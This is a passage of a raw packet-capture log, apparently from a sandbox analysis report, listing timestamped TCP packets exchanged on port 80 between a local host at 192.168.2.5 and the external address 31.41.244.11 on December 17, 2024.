Dec 17, 2024 06:03:41.036264896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.036305904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.036420107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.036484003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.037328959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.037503004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.037555933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.038247108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.038301945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.038404942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.038448095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.039443970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.039499044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.039589882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.039629936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.040468931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.040491104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.040515900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.040533066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.041588068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.041631937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.041745901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.041821957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.042623043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.042645931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.042690992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.043665886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.043723106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.043879986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.044823885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.044857025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.044876099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.044898033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.045838118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.046175003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.182279110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.182349920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.182485104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.182766914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.182801962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.182821989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.182858944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.183835030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.183873892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.183919907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.184818029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.184869051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.184902906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.184948921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.185856104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.185902119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.186022997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.186068058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.186945915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.186992884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.187055111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.187098980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.188039064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.188082933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.188103914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.188147068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.189049006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.189093113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.189168930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.189210892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.190150023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.190195084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.190232038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.190274954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.191164970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.191211939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.191283941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.191323996 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.192254066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.192289114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.192302942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.192328930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.193285942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.193331957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.193407059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.193445921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.194370031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.194413900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.194478035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.194518089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.195409060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.195456028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.195501089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.195545912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.196494102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.196540117 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.196568012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.196609020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.197577953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.197622061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.197632074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.197673082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.198641062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.198684931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.198698997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.198744059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.199697971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.199749947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.199786901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.199826002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.200700045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.200750113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.200803995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.200849056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.201787949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.201881886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.201914072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.201976061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.202884912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.202910900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.202965021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.203886032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.203927994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.204009056 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.204052925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.205156088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.205179930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.205205917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.205216885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.206245899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.206271887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.206295013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.206320047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.207144976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.207170963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.207191944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.207211971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.208148956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.208197117 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.208231926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.208276987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.209249020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.209304094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.209326982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.209367037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.210258961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.210309029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.210407019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.210527897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.211339951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.211400986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.211445093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.212369919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.212476969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.212521076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.213484049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.213501930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.213531971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.213555098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.214560986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.214584112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.214627981 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.215645075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.215670109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.215693951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.215718985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.216722965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.216747999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.216795921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.217807055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.217832088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.217859030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.217885971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.218700886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.218874931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.218926907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.219753981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.219805956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.219933033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.220134020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.220874071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.220918894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.220946074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.220988035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.221921921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.221968889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.222070932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.222114086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.222969055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.223016024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.223058939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.223107100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.224081993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.224140882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.224169016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.224210978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.225090027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.225157976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.225199938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.225244999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.226227999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.226253033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.226273060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.226286888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.227302074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.227374077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.227458000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.227504969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.228295088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.228358984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.228400946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.228465080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.229336977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.229409933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.229502916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.229710102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.230472088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.230495930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.230540037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.231451035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.231549978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.231599092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.231643915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.232603073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.232628107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.232656002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.232671976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.233625889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.233681917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.233706951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.233745098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.234709024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.234755039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.234819889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.235049009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.235860109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.235908985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.235955000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.236757040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.236804962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.236867905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.236913919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.237780094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.237831116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.374219894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.374239922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.374286890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.374325991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.374425888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.374471903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.374561071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.374629974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.375606060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.375627995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.375652075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.375667095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.376662016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.376681089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.377043962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.377811909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.377827883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.378719091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.378958941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.378989935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.379029989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.380294085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.380343914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.380410910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.380455017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.380904913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.380949974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.380987883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.381031990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.381983995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.381998062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.382034063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.382981062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.383027077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.383146048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.383191109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.384016037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.384066105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.384121895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.384167910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.385128021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.385179996 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.385195971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.385262012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.386192083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.386235952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.386307001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.386351109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.387212992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.387371063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.387417078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.388500929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.388521910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.388566017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.389400005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.389448881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.389641047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.389679909 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.390412092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.390455961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.390537977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.390574932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.391669035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.391693115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.391715050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.391731024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.392997026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.393012047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.393057108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.393852949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.393872023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.393903971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.393923044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.395351887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.395370007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.395405054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.395421982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.395700932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.395739079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.395811081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.395847082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.398838043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.398852110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.398876905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.398893118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.398909092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.398926020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.398948908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.398966074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.399355888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.399399042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.400033951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.400052071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.400078058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.400094986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.400957108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.401004076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.401103020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.401139975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.402204990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.402223110 CET	80	49902	31.41.244.11	192.168.2.5
